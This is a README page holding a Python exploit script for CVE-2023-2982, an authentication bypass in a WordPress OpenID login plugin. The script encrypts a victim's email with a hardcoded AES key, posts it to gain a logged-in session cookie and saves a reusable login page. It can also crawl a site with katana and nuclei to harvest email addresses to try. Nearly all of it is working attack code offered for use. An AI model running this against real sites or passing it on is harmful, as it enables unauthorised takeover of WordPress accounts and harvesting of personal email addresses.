README.md
Rendering markdown...
#!/usr/bin/python3
import sys
import getopt
import requests
import os
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad##, unpad
import base64
import argparse
import random
import string
import requests
import json
import lxml.etree as ET
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
passphrase = 'jMj7MEdu4wkHObiD'
# Setting User-Agent for all requests.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
session.headers.update({'User-Agent': user_agent})
random_string = ''.join(random.choices(string.digits, k=4))
def try_login(website_url,email):
# format url
website_url = website_url.rstrip('\/') + '/'
# encrypt and encode email
cipher = AES.new(passphrase.encode('utf-8'), AES.MODE_ECB)
padded_email = pad(email.encode('utf-8'), AES.block_size)
encrypted_email = cipher.encrypt(padded_email)
encoded_email = base64.b64encode(encrypted_email).decode('utf-8')
# post moopenid
try:
response = session.post(website_url, headers={'Content-Type': 'application/x-www-form-urlencoded'},
data={'option': 'moopenid', 'email': encoded_email, 'appName': 'rlHeqZw2vrPzOiWWfCParA=='},
allow_redirects=False,verify=False,timeout=10)
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
# Opening the file and replacing the desired strings
with open("login.html", 'r') as file:
file_content = file.read()
replaced_content = file_content.replace('WEBSITE_REPLACE', website_url).replace('EMAIL_REPLACE', encoded_email)
# Writing the updated content back to the file
with open("login-"+random_string+".html", 'w') as file:
file.write(replaced_content)
print("Login Worked!")
print("To Login again open login-"+random_string+".html")
os.system("open login-"+random_string+".html")
else:
print("Login Failed with "+email+"")
except requests.exceptions.RequestException as e:
print('Error occurred while logging in:', str(e))
def scan_and_extract(website_url):
#print("Crawling "+website_url+" for email addresses.")
cmd1 = "katana -kf all -u "+website_url+" -o /tmp/katana.txt"
#used this template for better email regex pattern https://github.com/panch0r3d/nuclei-templates/blob/master/email-extraction.yaml
cmd2 = "nuclei -l /tmp/katana.txt -t email-extraction.yaml -nc -nm -fr -o /tmp/nuc.txt"
print("Crawling "+website_url+" for email addresses.")
os.system(cmd1)
print("Using Nuclei to extract emails from links")
os.system(cmd2)
with open("/tmp/nuc.txt", "r") as f:
lines = f.readlines()
emails = set()
for line in lines:
matches = re.findall(r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b', line)
emails.update(matches)
with open("/tmp/nuc.txt", "w") as f:
for email in emails:
f.write(email + "\n")
try_login(website_url,email)
def main():
parser = argparse.ArgumentParser(description='CVE-2023-2982.py')
parser.add_argument('-w', '--website_url', required=True,help='Website URL')
parser.add_argument('-e', '--email',required=False, help='Email')
args = parser.parse_args()
website_url = args.website_url
email = args.email
if args.email:
try_login(website_url,email)
else:
scan_and_extract(website_url)
if __name__ == "__main__":
main()